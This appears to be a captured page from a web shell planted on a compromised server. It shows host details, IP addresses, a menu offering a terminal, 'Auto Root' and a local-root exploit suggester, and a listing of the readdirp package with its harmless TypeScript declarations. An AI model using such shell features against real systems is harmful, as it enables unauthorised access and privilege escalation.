Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.80.46
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
readdirp /
Delete
Unzip
Name
Size
Permission
Date
Action
LICENSE
1.09
KB
-rw-rw-r--
2022-08-30 11:49
README.md
6.78
KB
-rw-rw-r--
2022-08-30 11:49
index.d.ts
1018
B
-rw-rw-r--
2022-08-30 11:49
index.js
8.67
KB
-rw-rw-r--
2022-08-30 11:49
package.json
2.46
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
// TypeScript Version: 3.2 /// <reference types="node" lib="esnext" /> import * as fs from 'fs'; import { Readable } from 'stream'; declare namespace readdir { interface EntryInfo { path: string; fullPath: string; basename: string; stats?: fs.Stats; dirent?: fs.Dirent; } interface ReaddirpOptions { root?: string; fileFilter?: string | string[] | ((entry: EntryInfo) => boolean); directoryFilter?: string | string[] | ((entry: EntryInfo) => boolean); type?: 'files' | 'directories' | 'files_directories' | 'all'; lstat?: boolean; depth?: number; alwaysStat?: boolean; } interface ReaddirpStream extends Readable, AsyncIterable<EntryInfo> { read(): EntryInfo; [Symbol.asyncIterator](): AsyncIterableIterator<EntryInfo>; } function promise( root: string, options?: ReaddirpOptions ): Promise<EntryInfo[]>; } declare function readdir( root: string, options?: readdir.ReaddirpOptions ): readdir.ReaddirpStream; export = readdir;